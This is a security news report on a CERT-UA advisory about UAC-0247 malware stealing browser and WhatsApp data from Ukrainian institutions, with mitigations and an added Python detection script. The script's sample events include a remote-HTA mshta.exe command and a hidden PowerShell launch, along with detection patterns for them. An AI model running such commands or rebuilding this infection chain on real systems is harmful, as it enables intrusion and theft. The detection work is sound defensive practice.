UAC-0247 Targets Ukrainian Entities with Data-Stealing Malware
The **Computer Emergency Response Team of Ukraine (CERT-UA)** has uncovered a campaign targeting Ukrainian governmental and healthcare organizations with sophisticated malware. The threat actor, tracked as **UAC-0247**, employs a multi-stage attack to steal sensitive data from Chromium-based browsers and **WhatsApp**.
The **Computer Emergency Response Team of Ukraine (CERT-UA)** has disclosed a new campaign targeting Ukrainian government and municipal healthcare institutions, including clinics and emergency hospitals. The attacks deliver malware designed to steal sensitive data from Chromium-based web browsers and **WhatsApp**.
### Campaign Details
The malicious activity, observed between March and April 2026, has been attributed to a threat cluster dubbed **UAC-0247**. The origins of this campaign are currently unknown.
According to **CERT-UA**, the attack begins with an email claiming to offer humanitarian aid. Recipients are urged to click a link that redirects to either a legitimate website compromised via a cross-site scripting (XSS) vulnerability or a fake site created using artificial intelligence (AI) tools.
Regardless of the site, the goal is to download and execute a Windows Shortcut (LNK) file. This file then executes a remote HTML Application (HTA) using the native Windows utility, `mshta.exe`. The HTA file displays a decoy form to distract the victim while fetching a binary that injects shellcode into a legitimate process, such as `runtimeBroker.exe`.
"At the same time, recent campaigns have recorded the use of a two-stage loader, the second stage of which is implemented using a proprietary executable file format (with full support for code and data sections, import of functions from dynamic libraries, and relocation), and the final payload is additionally compressed and encrypted," **CERT-UA** said.
One of the stagers is a TCP reverse shell (or an equivalent tool) tracked as **RAVENSHELL**, which establishes a TCP connection to a management server and receives commands that it executes on the host via `cmd.exe`.
Also downloaded to the infected machine are the **AGINGFLY** malware family and a **PowerShell** script called **SILENTLOOP**. **SILENTLOOP** includes functions to execute commands, update its configuration automatically, and obtain the current IP address of the management server from a **Telegram** channel, with fallback mechanisms for determining the command-and-control (C2) address.
Developed in C#, **AGINGFLY** is designed for remote control of compromised systems. It communicates with a C2 server over WebSockets to fetch instructions that allow it to execute commands, launch a keylogger, download files, and run additional payloads.

### Data Exfiltration and Tools
An investigation of about a dozen incidents revealed that these attacks facilitate reconnaissance, lateral movement, and the theft of credentials and other sensitive data from **WhatsApp** and Chromium-based browsers. This is achieved by deploying various open-source tools, including:
* **ChromElevator**: A program designed to bypass Chromium's app-bound encryption (ABE) protections and harvest cookies and saved passwords.
* **ZAPiXDESK**: A forensic extraction tool to decrypt local databases for **WhatsApp** Web.
* **RustScan**: A network scanner.
* **Ligolo-Ng**: A lightweight utility to establish tunnels from reverse TCP/TLS connections.
* **Chisel**: A tool for tunneling network traffic over TCP/UDP.
* **XMRig**: A cryptocurrency miner.
### Targeting of Ukrainian Defense Forces
The agency also found evidence suggesting that representatives of the Defense Forces of Ukraine may have been targeted as part of the campaign. This is based on the distribution of malicious ZIP archives via **Signal** designed to drop **AGINGFLY** using the DLL side-loading technique.
### Mitigation
To mitigate the risk associated with this threat and minimize the attack surface, it is recommended to restrict the execution of LNK, HTA, and JS files, along with legitimate utilities such as `mshta.exe`, `powershell.exe`, and `wscript.exe`.
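Beyond blocking the script hosts outright, defenders can alert on the specific way this chain uses them: `mshta.exe` launched with a remote URL, a script host running content from a user-writable folder, and a script host spawned by `mshta.exe`. The following Python is an added example, not code from CERT-UA's advisory; it runs three such rules over constructed process-creation events modelled on Sysmon Event ID 1 fields, with placeholder hostnames and paths that are not indicators from the advisory.

```python
import re

# Constructed sample events (Sysmon Event ID 1 style). Hosts and paths are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://aid-form.example/humanitarian.hta'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Vendor\Installer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\ui.hta"'},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'wscript.exe "C:\Users\alice\Downloads\invoice.js"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'powershell.exe -w hidden -c "..."'},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
]

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(Downloads|AppData)\\|\\Temp\\", re.IGNORECASE)
SCRIPT_HOSTS = ("mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe")


def basename(path):
    """Last path component, lower-cased, so rules compare image names only."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the detection labels that apply to one process-creation event."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event["CommandLine"]
    hits = []
    # Rule 1: mshta.exe given a URL executes an HTA fetched over the network (the LNK -> HTA stage).
    if image == "mshta.exe" and REMOTE_URL.search(cmd):
        hits.append("mshta_remote_hta")
    # Rule 2: a script host running a file from a user-writable location (dropped LNK/JS/HTA).
    if image in SCRIPT_HOSTS and USER_WRITABLE.search(cmd):
        hits.append("script_host_user_writable_path")
    # Rule 3: a script host spawned by mshta.exe, i.e. the HTA chaining into the next stage.
    if image in SCRIPT_HOSTS and parent == "mshta.exe":
        hits.append("script_host_child_of_mshta")
    return hits


def scan(events):
    """Map each flagged command line to its detection labels; unflagged events are dropped."""
    return {e["CommandLine"]: classify(e) for e in events if classify(e)}
```

The second event (a vendor installer launching a local HTA) is intentionally left unflagged, which is the kind of benign use a blanket `mshta.exe` block would break.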